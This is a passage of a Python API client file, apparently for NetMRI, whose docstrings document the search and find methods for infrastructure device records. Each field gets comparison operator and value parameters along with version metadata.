:param sort: The data field(s) to use for sorting the output. Default is DeviceID. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each InfraDevice. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against infra devices, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: DataSourceID, DeviceAddlInfo, DeviceAssurance, DeviceConfigLastCheckedTime, DeviceConfigTimestamp, DeviceContextName, DeviceDNSName, DeviceFirstOccurrenceTime, DeviceID, DeviceIPDotted, DeviceIPNumeric, DeviceMAC, DeviceModel, DeviceName, DeviceNetBIOSName, DeviceOUI, DevicePolicyScheduleMode, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSAAVersion, DeviceSavedConfigLastChangedTime, DeviceSysContact, DeviceSysDescr, DeviceSysLocation, DeviceSysName, DeviceType, DeviceUniqueKey, DeviceVendor, DeviceVersion, FilterProvisionData, FilteringInd, InfraDeviceChangedCols, InfraDeviceEndTime, InfraDeviceStartTime, InfraDeviceTimestamp, MgmtServerDeviceID, NetworkDeviceInd, ParentDeviceID, RoutingInd, SwitchingInd, VirtualInd, VirtualNetworkID, VirtualNetworkingInd.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
| ``api version min:`` 2.10
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param detail_ind: A flag to indicate whether discovery times should be included or not
:type detail_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_devices: An array of the InfraDevice objects that match the specified input criteria.
:rtype infra_devices: Array of InfraDevice
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available infra devices matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: DataSourceID, DeviceAddlInfo, DeviceAssurance, DeviceConfigLastCheckedTime, DeviceConfigTimestamp, DeviceContextName, DeviceDNSName, DeviceFirstOccurrenceTime, DeviceID, DeviceIPDotted, DeviceIPNumeric, DeviceMAC, DeviceModel, DeviceName, DeviceNetBIOSName, DeviceOUI, DevicePolicyScheduleMode, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSAAVersion, DeviceSavedConfigLastChangedTime, DeviceSysContact, DeviceSysDescr, DeviceSysLocation, DeviceSysName, DeviceType, DeviceUniqueKey, DeviceVendor, DeviceVersion, FilterProvisionData, FilteringInd, InfraDeviceChangedCols, InfraDeviceEndTime, InfraDeviceStartTime, InfraDeviceTimestamp, MgmtServerDeviceID, NetworkDeviceInd, ParentDeviceID, RoutingInd, SwitchingInd, VirtualInd, VirtualNetworkID, VirtualNetworkingInd.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceAddlInfo: The operator to apply to the field DeviceAddlInfo. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceAddlInfo: Additional information about the device; IP phones will contain the extension in this field. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceAddlInfo: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceAddlInfo: If op_DeviceAddlInfo is specified, the field named in this input will be compared to the value in DeviceAddlInfo using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceAddlInfo must be specified if op_DeviceAddlInfo is specified.
:type val_f_DeviceAddlInfo: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceAddlInfo: If op_DeviceAddlInfo is specified, this value will be compared to the value in DeviceAddlInfo using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceAddlInfo must be specified if op_DeviceAddlInfo is specified.
:type val_c_DeviceAddlInfo: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceAssurance: The operator to apply to the field DeviceAssurance. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceAssurance: The assurance level of the device type value. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceAssurance: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceAssurance: If op_DeviceAssurance is specified, the field named in this input will be compared to the value in DeviceAssurance using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceAssurance must be specified if op_DeviceAssurance is specified.
:type val_f_DeviceAssurance: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceAssurance: If op_DeviceAssurance is specified, this value will be compared to the value in DeviceAssurance using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceAssurance must be specified if op_DeviceAssurance is specified.
:type val_c_DeviceAssurance: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceConfigLastCheckedTime: The operator to apply to the field DeviceConfigLastCheckedTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceConfigLastCheckedTime: The date/time of the last attempted retrieval of the device's configuration file. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceConfigLastCheckedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceConfigLastCheckedTime: If op_DeviceConfigLastCheckedTime is specified, the field named in this input will be compared to the value in DeviceConfigLastCheckedTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceConfigLastCheckedTime must be specified if op_DeviceConfigLastCheckedTime is specified.
:type val_f_DeviceConfigLastCheckedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceConfigLastCheckedTime: If op_DeviceConfigLastCheckedTime is specified, this value will be compared to the value in DeviceConfigLastCheckedTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceConfigLastCheckedTime must be specified if op_DeviceConfigLastCheckedTime is specified.
:type val_c_DeviceConfigLastCheckedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceConfigTimestamp: The operator to apply to the field DeviceConfigTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceConfigTimestamp: The date/time the configuration file was last successfully retrieved for this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceConfigTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceConfigTimestamp: If op_DeviceConfigTimestamp is specified, the field named in this input will be compared to the value in DeviceConfigTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceConfigTimestamp must be specified if op_DeviceConfigTimestamp is specified.
:type val_f_DeviceConfigTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceConfigTimestamp: If op_DeviceConfigTimestamp is specified, this value will be compared to the value in DeviceConfigTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceConfigTimestamp must be specified if op_DeviceConfigTimestamp is specified.
:type val_c_DeviceConfigTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceContextName: The operator to apply to the field DeviceContextName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceContextName: The name of the virtual context of this virtual device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceContextName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceContextName: If op_DeviceContextName is specified, the field named in this input will be compared to the value in DeviceContextName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceContextName must be specified if op_DeviceContextName is specified.
:type val_f_DeviceContextName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceContextName: If op_DeviceContextName is specified, this value will be compared to the value in DeviceContextName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceContextName must be specified if op_DeviceContextName is specified.
:type val_c_DeviceContextName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceDNSName: The operator to apply to the field DeviceDNSName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceDNSName: The device name as reported by DNS. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceDNSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceDNSName: If op_DeviceDNSName is specified, the field named in this input will be compared to the value in DeviceDNSName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceDNSName must be specified if op_DeviceDNSName is specified.
:type val_f_DeviceDNSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceDNSName: If op_DeviceDNSName is specified, this value will be compared to the value in DeviceDNSName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceDNSName must be specified if op_DeviceDNSName is specified.
:type val_c_DeviceDNSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceFirstOccurrenceTime: The operator to apply to the field DeviceFirstOccurrenceTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceFirstOccurrenceTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceFirstOccurrenceTime: If op_DeviceFirstOccurrenceTime is specified, the field named in this input will be compared to the value in DeviceFirstOccurrenceTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceFirstOccurrenceTime must be specified if op_DeviceFirstOccurrenceTime is specified.
:type val_f_DeviceFirstOccurrenceTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceFirstOccurrenceTime: If op_DeviceFirstOccurrenceTime is specified, this value will be compared to the value in DeviceFirstOccurrenceTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceFirstOccurrenceTime must be specified if op_DeviceFirstOccurrenceTime is specified.
:type val_c_DeviceFirstOccurrenceTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: An internal NetMRI identifier for the device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceIPDotted: The operator to apply to the field DeviceIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceIPDotted: If op_DeviceIPDotted is specified, the field named in this input will be compared to the value in DeviceIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceIPDotted must be specified if op_DeviceIPDotted is specified.
:type val_f_DeviceIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceIPDotted: If op_DeviceIPDotted is specified, this value will be compared to the value in DeviceIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceIPDotted must be specified if op_DeviceIPDotted is specified.
:type val_c_DeviceIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceIPNumeric: The operator to apply to the field DeviceIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceIPNumeric: The numerical value of the device IP address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceIPNumeric: If op_DeviceIPNumeric is specified, the field named in this input will be compared to the value in DeviceIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceIPNumeric must be specified if op_DeviceIPNumeric is specified.
:type val_f_DeviceIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceIPNumeric: If op_DeviceIPNumeric is specified, this value will be compared to the value in DeviceIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceIPNumeric must be specified if op_DeviceIPNumeric is specified.
:type val_c_DeviceIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceMAC: The operator to apply to the field DeviceMAC. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceMAC: The MAC of the interface corresponding to the management IP, if available. Otherwise, it is the lowest numbered non-zero MAC for any interface on the device. If no interface records are available for the device, the lowest non-zero MAC address corresponding to the management IP address found in the global ARP table will be used. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceMAC: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceMAC: If op_DeviceMAC is specified, the field named in this input will be compared to the value in DeviceMAC using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceMAC must be specified if op_DeviceMAC is specified.
:type val_f_DeviceMAC: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceMAC: If op_DeviceMAC is specified, this value will be compared to the value in DeviceMAC using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceMAC must be specified if op_DeviceMAC is specified.
:type val_c_DeviceMAC: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceModel: The operator to apply to the field DeviceModel. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceModel: The device model name. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceModel: If op_DeviceModel is specified, the field named in this input will be compared to the value in DeviceModel using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceModel must be specified if op_DeviceModel is specified.
:type val_f_DeviceModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceModel: If op_DeviceModel is specified, this value will be compared to the value in DeviceModel using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceModel must be specified if op_DeviceModel is specified.
:type val_c_DeviceModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceName: The operator to apply to the field DeviceName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceName: If op_DeviceName is specified, the field named in this input will be compared to the value in DeviceName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceName must be specified if op_DeviceName is specified.
:type val_f_DeviceName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceName: If op_DeviceName is specified, this value will be compared to the value in DeviceName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceName must be specified if op_DeviceName is specified.
:type val_c_DeviceName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceNetBIOSName: The operator to apply to the field DeviceNetBIOSName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceNetBIOSName: The NetBIOS name of the device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceNetBIOSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceNetBIOSName: If op_DeviceNetBIOSName is specified, the field named in this input will be compared to the value in DeviceNetBIOSName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceNetBIOSName must be specified if op_DeviceNetBIOSName is specified.
:type val_f_DeviceNetBIOSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceNetBIOSName: If op_DeviceNetBIOSName is specified, this value will be compared to the value in DeviceNetBIOSName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceNetBIOSName must be specified if op_DeviceNetBIOSName is specified.
:type val_c_DeviceNetBIOSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceOUI: The operator to apply to the field DeviceOUI. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceOUI: The NetMRI-determined device vendor using OUI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceOUI: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceOUI: If op_DeviceOUI is specified, the field named in this input will be compared to the value in DeviceOUI using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceOUI must be specified if op_DeviceOUI is specified.
:type val_f_DeviceOUI: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceOUI: If op_DeviceOUI is specified, this value will be compared to the value in DeviceOUI using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceOUI must be specified if op_DeviceOUI is specified.
:type val_c_DeviceOUI: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DevicePolicyScheduleMode: The operator to apply to the field DevicePolicyScheduleMode. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DevicePolicyScheduleMode: Not currently used. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DevicePolicyScheduleMode: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DevicePolicyScheduleMode: If op_DevicePolicyScheduleMode is specified, the field named in this input will be compared to the value in DevicePolicyScheduleMode using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DevicePolicyScheduleMode must be specified if op_DevicePolicyScheduleMode is specified.
:type val_f_DevicePolicyScheduleMode: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DevicePolicyScheduleMode: If op_DevicePolicyScheduleMode is specified, this value will be compared to the value in DevicePolicyScheduleMode using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DevicePolicyScheduleMode must be specified if op_DevicePolicyScheduleMode is specified.
:type val_c_DevicePolicyScheduleMode: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceRebootTime: The operator to apply to the field DeviceRebootTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceRebootTime: The date/time this device was last rebooted. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceRebootTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceRebootTime: If op_DeviceRebootTime is specified, the field named in this input will be compared to the value in DeviceRebootTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceRebootTime must be specified if op_DeviceRebootTime is specified.
:type val_f_DeviceRebootTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceRebootTime: If op_DeviceRebootTime is specified, this value will be compared to the value in DeviceRebootTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceRebootTime must be specified if op_DeviceRebootTime is specified.
:type val_c_DeviceRebootTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceRunningConfigLastChangedTime: The operator to apply to the field DeviceRunningConfigLastChangedTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceRunningConfigLastChangedTime: The date/time, as reported by SNMP, that the device's running configuration was last changed. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceRunningConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceRunningConfigLastChangedTime: If op_DeviceRunningConfigLastChangedTime is specified, the field named in this input will be compared to the value in DeviceRunningConfigLastChangedTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceRunningConfigLastChangedTime must be specified if op_DeviceRunningConfigLastChangedTime is specified.
:type val_f_DeviceRunningConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceRunningConfigLastChangedTime: If op_DeviceRunningConfigLastChangedTime is specified, this value will be compared to the value in DeviceRunningConfigLastChangedTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceRunningConfigLastChangedTime must be specified if op_DeviceRunningConfigLastChangedTime is specified.
:type val_c_DeviceRunningConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSAAVersion: The operator to apply to the field DeviceSAAVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSAAVersion: The SAA version running on this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceSAAVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSAAVersion: If op_DeviceSAAVersion is specified, the field named in this input will be compared to the value in DeviceSAAVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSAAVersion must be specified if op_DeviceSAAVersion is specified.
:type val_f_DeviceSAAVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSAAVersion: If op_DeviceSAAVersion is specified, this value will be compared to the value in DeviceSAAVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSAAVersion must be specified if op_DeviceSAAVersion is specified.
:type val_c_DeviceSAAVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSavedConfigLastChangedTime: The operator to apply to the field DeviceSavedConfigLastChangedTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSavedConfigLastChangedTime: The date/time, as reported by SNMP, that the device's saved configuration was last changed. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceSavedConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSavedConfigLastChangedTime: If op_DeviceSavedConfigLastChangedTime is specified, the field named in this input will be compared to the value in DeviceSavedConfigLastChangedTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSavedConfigLastChangedTime must be specified if op_DeviceSavedConfigLastChangedTime is specified.
:type val_f_DeviceSavedConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSavedConfigLastChangedTime: If op_DeviceSavedConfigLastChangedTime is specified, this value will be compared to the value in DeviceSavedConfigLastChangedTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSavedConfigLastChangedTime must be specified if op_DeviceSavedConfigLastChangedTime is specified.
:type val_c_DeviceSavedConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
